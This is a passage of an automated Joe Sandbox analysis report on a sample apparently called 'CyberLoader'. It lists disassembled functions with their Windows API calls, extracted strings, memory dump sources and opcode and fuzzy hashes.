                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: *
                                                  • API String ID: 776569668-3442289017
                                                  • Opcode ID: a7983700e164b8eccbd2c9095447c60d2799c62413b7943fd3141071e96c4035
                                                  • Instruction ID: 6ceb7d9045ffb315f8783f9026c543044efd4e719307aed1f9affd548f97cdfc
                                                  • Opcode Fuzzy Hash: a7983700e164b8eccbd2c9095447c60d2799c62413b7943fd3141071e96c4035
                                                  • Instruction Fuzzy Hash: 6CF01774D22525AB8F116F16BC1D4053B69BF1672030E561BF80096E70DF329C729FC1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280D0D
                                                    • Part of subcall function 0027ACF5: GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  • LocalFileTimeToFileTime.KERNEL32(?,00280CB8), ref: 00280D31
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00280D47
                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00280D56
                                                  • SystemTimeToFileTime.KERNEL32(?,00280CB8), ref: 00280D64
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280D72
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  • Opcode ID: 132831cb2b4aa0f00e1cde38a47a64530715df2145d865982a6799c9c2ac5f6f
                                                  • Instruction ID: 8fe29512e9601faa4d9e4665c41a0a277ec77327ca8e150a2fbb85e9da285914
                                                  • Opcode Fuzzy Hash: 132831cb2b4aa0f00e1cde38a47a64530715df2145d865982a6799c9c2ac5f6f
                                                  • Instruction Fuzzy Hash: 01310C7A91020AEBCB00EFE5D8859EFFBBCFF58700B04455AE955E3210EB309655CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: a22cf480ce2235f8bb516809ac583f01eb3f3a8e30319ff665112c9b8251fc30
                                                  • Instruction ID: 2156c21b4210a8f32edd54bb7615e464c3f38b95bdaa066c0da38a65baa5027b
                                                  • Opcode Fuzzy Hash: a22cf480ce2235f8bb516809ac583f01eb3f3a8e30319ff665112c9b8251fc30
                                                  • Instruction Fuzzy Hash: 0121B57562510EBBDB04BE10CD81E3B77ADEB92784B188124FC0997286E670EDA19790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028D2F2
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028D30C
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028D31D
                                                  • TranslateMessage.USER32(?), ref: 0028D327
                                                  • DispatchMessageW.USER32(?), ref: 0028D331
                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028D33C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 2148572870-0
                                                  • Opcode ID: 7fe128a15af140314e0c967561722b17420e44fa85bff16d8e88dfd2775761ea
                                                  • Instruction ID: 92e96c4d2dd08f7721e97a07982b48f6edbaa489ebb7de93bba88b6f6dbe74f8
                                                  • Opcode Fuzzy Hash: 7fe128a15af140314e0c967561722b17420e44fa85bff16d8e88dfd2775761ea
                                                  • Instruction Fuzzy Hash: FDF03171E02119ABCB206FA1EC4DDDBBF6DEF62352F048012F506D2050D6359955CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcschr.LIBVCRUNTIME ref: 0028C435
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CompareString_wcschr
                                                  • String ID: <$HIDE$MAX$MIN
                                                  • API String ID: 2548945186-3358265660
                                                  • Opcode ID: 194cd1a8efabf708275da2db424995cf15472954061c734da89f1fa607dcd422
                                                  • Instruction ID: f9f7f43ac7af167c5ce89976155f5b9610ec9d661a36b6ab756c0d072f270015
                                                  • Opcode Fuzzy Hash: 194cd1a8efabf708275da2db424995cf15472954061c734da89f1fa607dcd422
                                                  • Instruction Fuzzy Hash: 4231877A911209AAEF25EE94CC41FEB77BCDB14310F104066F905D60D0EBB09EE4CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028A9DE
                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0028A9F6
                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0028AA24
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: GETPASSWORD1$xj,
                                                  • API String ID: 445417207-1809890633
                                                  • Opcode ID: 0343a29618b29aec236ed9d5dba5f43c359de3b21ad1d574ade5a11002da65a4
                                                  • Instruction ID: 4a2b353fe8fffdee788801f41df5b24240747cafaa777612ff1be2e8ed91a54f
                                                  • Opcode Fuzzy Hash: 0343a29618b29aec236ed9d5dba5f43c359de3b21ad1d574ade5a11002da65a4
                                                  • Instruction Fuzzy Hash: B7114C36965119BAEB21AE649D09FF6373CEB59301F000053FA49B24C0DAB0AD75D772
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadBitmapW.USER32(00000065), ref: 0028ADFD
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028AE22
                                                  • DeleteObject.GDI32(00000000), ref: 0028AE54
                                                  • DeleteObject.GDI32(00000000), ref: 0028AE77
                                                    • Part of subcall function 00289E1C: FindResourceW.KERNEL32(0028AE4D,PNG,?,?,?,0028AE4D,00000066), ref: 00289E2E
                                                    • Part of subcall function 00289E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0028AE4D,00000066), ref: 00289E46
                                                    • Part of subcall function 00289E1C: LoadResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E59
                                                    • Part of subcall function 00289E1C: LockResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                  • String ID: ]
                                                  • API String ID: 142272564-3352871620
                                                  • Opcode ID: 0c2c62bf6ec781e4393232d33f1f0b5a5d0a8d0b5a7b1eeb0d8129dcb30a799c
                                                  • Instruction ID: 367af5d88a5b11dee46af77ff11aafd0e378fd08da88ae61dfd6cd1559bc5f42
                                                  • Opcode Fuzzy Hash: 0c2c62bf6ec781e4393232d33f1f0b5a5d0a8d0b5a7b1eeb0d8129dcb30a799c
                                                  • Instruction Fuzzy Hash: 0B01043A952216A7D7107B64AC09A7F7B69AB91B42F0C0122BE00A72D1DE318C359BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028CCDB
                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0028CCF1
                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028CD05
                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0028CD14
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: RENAMEDLG
                                                  • API String ID: 445417207-3299779563
                                                  • Opcode ID: f0d42a2e5dc3b68631763d5627ceea8af4737e9eb74b84a3b49b1e4e8d5a4663
                                                  • Instruction ID: 71dfbbe78d0312491365be5c4b62f87b31f093c649f641f2fa341cdb33773b23
                                                  • Opcode Fuzzy Hash: f0d42a2e5dc3b68631763d5627ceea8af4737e9eb74b84a3b49b1e4e8d5a4663
                                                  • Instruction Fuzzy Hash: CD0128366E6211BFD5116F64AC0CF577B5CEB6AB02F204413F349A20E1C7B1A9258B75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00292503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0029251A
                                                    • Part of subcall function 00292B52: ___AdjustPointer.LIBCMT ref: 00292B9C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00292531
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00292543
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00292567
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID: /))
                                                  • API String ID: 2633735394-3399802696
                                                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                  • Instruction ID: 60106cde6f7416ef060436de9b590bf3ceeeca82b78644a9bbf3c631968acf8b
                                                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                  • Instruction Fuzzy Hash: 63011332010109FBCF12AF65DD01EDA3BBAEF58714F068014F91866120C376E975EFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00297573,00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002), ref: 002975E2
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002975F5
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00297573,00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002), ref: 00297618
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 19aef653561eb81dedc2c72e7bdbc29f34e1a53594896623541dca64f4deaf3f
                                                  • Instruction ID: 0b08ef90a94404994af7bb16773283dc94232b458c3dd952e4241028b965df31
                                                  • Opcode Fuzzy Hash: 19aef653561eb81dedc2c72e7bdbc29f34e1a53594896623541dca64f4deaf3f
                                                  • Instruction Fuzzy Hash: A7F08C30A28618BBCB159FA4EC0DB9EBBB8EF06711F004069F805A2150DF308E50CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027EB92
                                                  • GetProcAddress.KERNEL32(002B81C0,CryptUnprotectMemory), ref: 0027EBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                  • API String ID: 2141747552-1753850145
                                                  • Opcode ID: 34b9b7f4aec6a6e3a4b552d7958b3779427183e8363f97a77c97cf705d0e32c3
                                                  • Instruction ID: d94a905cf13b675866041f3e0247c73b274ff790063f6d21f741a5847f71e27f
                                                  • Opcode Fuzzy Hash: 34b9b7f4aec6a6e3a4b552d7958b3779427183e8363f97a77c97cf705d0e32c3
                                                  • Instruction Fuzzy Hash: 90E04F714207429FCB20DF34A849B42BEE46B1A704B01C85DF4D6D3190DEB4D5648B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00297DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f6f609f268ff0f7c8cd3119681d0762a2d156981157ace34a3791981ecc3b680
                                                  • Instruction ID: 2b4cf4b8d6fe082cec1376c5ff4789306e7cdad2c83687314c51c78656db99e0
                                                  • Opcode Fuzzy Hash: f6f609f268ff0f7c8cd3119681d0762a2d156981157ace34a3791981ecc3b680
                                                  • Instruction Fuzzy Hash: 4C41F232A203049FCF24DF78C881A6EB7A5EF89714F5645A8E515EB381EB30ED11CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0029B619
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029B63C
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029B662
                                                  • _free.LIBCMT ref: 0029B675
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029B684
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 4ef1088e654d3da7b3ea9240ac85419fff395e0681aae946dbe744276e40e3b2
                                                  • Instruction ID: eb6658d7415c4dff67a571713175d1a937bbe9ca648ae48295aeb72864a50298
                                                  • Opcode Fuzzy Hash: 4ef1088e654d3da7b3ea9240ac85419fff395e0681aae946dbe744276e40e3b2
                                                  • Instruction Fuzzy Hash: 94018472622316BF6B225EBA7D8CC7BAA6DEEC7BA03150229FD04C3510DF60DD1195B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00280A41: ResetEvent.KERNEL32(?), ref: 00280A53
                                                    • Part of subcall function 00280A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00280A67
                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0028078F
                                                  • CloseHandle.KERNEL32(?,?), ref: 002807A9
                                                  • DeleteCriticalSection.KERNEL32(?), ref: 002807C2
                                                  • CloseHandle.KERNEL32(?), ref: 002807CE
                                                  • CloseHandle.KERNEL32(?), ref: 002807DA
                                                    • Part of subcall function 0028084E: WaitForSingleObject.KERNEL32(?,000000FF,00280A78,?), ref: 00280854
                                                    • Part of subcall function 0028084E: GetLastError.KERNEL32(?), ref: 00280860
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                  • String ID:
                                                  • API String ID: 1868215902-0
                                                  • Opcode ID: 4c14d7cff45e6b771ae177f440ad6f265106225fd21b8aa3423101c6e257c1d5
                                                  • Instruction ID: 0b359330c9a09f2a3d485067710fccbac6e24c43b60d9d0f236d1d4220b760e6
                                                  • Opcode Fuzzy Hash: 4c14d7cff45e6b771ae177f440ad6f265106225fd21b8aa3423101c6e257c1d5
                                                  • Instruction Fuzzy Hash: 7F019275450B04EFC721EB65EC88F86FBE9FB4A710F004519F15A821A0CB756A58CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0029BF28
